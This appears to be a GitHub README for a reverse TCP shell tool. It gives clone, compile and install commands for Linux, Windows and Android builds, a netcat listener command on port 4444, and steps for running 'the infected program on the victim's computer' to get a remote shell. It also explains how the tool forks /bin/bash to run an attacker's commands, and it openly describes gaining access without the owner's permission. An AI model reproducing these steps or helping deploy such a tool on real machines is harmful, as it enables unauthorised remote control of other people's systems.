TCP reverse shell is a type of shell in which the attacker creates a connection from the target machine back to the attacker's machine, rather than the attacker connecting directly to the target. In this script, the attacker typically sets up a listener on a specified port on their own machine, and the victim machine is then compromised with malware that establishes a connection to the attacker's listener. Once the connection is established, the attacker has access to a command prompt on the victim machine, and can execute commands and interact with the system as if they were sitting at the machine itself. This technique is commonly used in cyber attacks and penetration testing
Installing and using program process:
Execute all commands on behalf of the superuser and set your machine ip and port in files
- Download or clone this repository.
git clone https://github.com/Untouchable17/Reverse-TCP-Shell
- Make the file executable with the chmod +x command
chmod +x install.sh
3. Run the bash script `install.sh`
This script will automatically download and install all the necessary dependencies, compile the programs, and then offer you to choose 1 of 3 start options
Other Method: Manual Installation
- Downloading or cloning this GitHub repository.
git clone https://github.com/Untouchable17/TCP-Reverse-Shell
- Update system packages and install libpcap
apt-get update && apt-get upgrade -y
apt-get install libpcap-dev -y
- Compile files
g++ ReverseShell.cpp -o ReverseShell.o
g++ SecureTCPConnection.cpp -o SecureTCPConnection.o
- Run one of the program
./ReverseShell.o or ./SecureTCPConnection.o
You can add the correct path to global like this: export PATH="$PATH:$(pwd)" and then you can run the program by just entering their name ReverseShell.o or SecureTCPConnection.o
For Windows
- Compile the program using the flag -lws2_32
g++ winshell.cpp -o winshell.exe -lws2_32
- Start the event listener and run the compiled program
Method 1: To build, use the `gradle build` command in the `Android Studio` terminal. This command will compile the source code and create an `APK file` that can be installed on an Android device
Method 2:Install Android SDK (Native Development Kit) and compile the program code in C++ with the command ndk-build and then assemble the APK file using ant release command
At first, start listening on the hacker's computer (or on your own) to the port you specified in the file (by default, port 4444), and then run the compiled infected file on the victim's computer
- Starting port listening
nc -nlvp SET_PORT (ex. 4444)
- Execute the infected program on the victim's computer
- Congratulations, now you have a shell
- If interactivity has not appeared, execute this command
script -a /dev/null
change shell: chsh -s /bin/{shell}
show list shells: cat /etc/shells
-
This program is a type of software that allows an attacker to gain remote access to a computer or network without the knowledge or permission of the system owner.
-
This code creates a TCP socket that connects to the specified server and port. Then the child process is created using the fork() call. The child process runs the /bin/bash shell, which allows an attacker to execute arbitrary commands on a remote system.
-
In the parent process, commands are read from a remote client via a socket. The received commands are passed to the child process for execution using the open() call, and the results of executing commands are sent back to the client via the socket. The parent process constantly waits for commands from the client and executes them until the client closes the connection.
-
In general, this code can be used for illegal access to a computer or network, so its use for illegal purposes is prohibited.
Telegram: @secdet17
Group: t.me/secdet_team
Email: [email protected]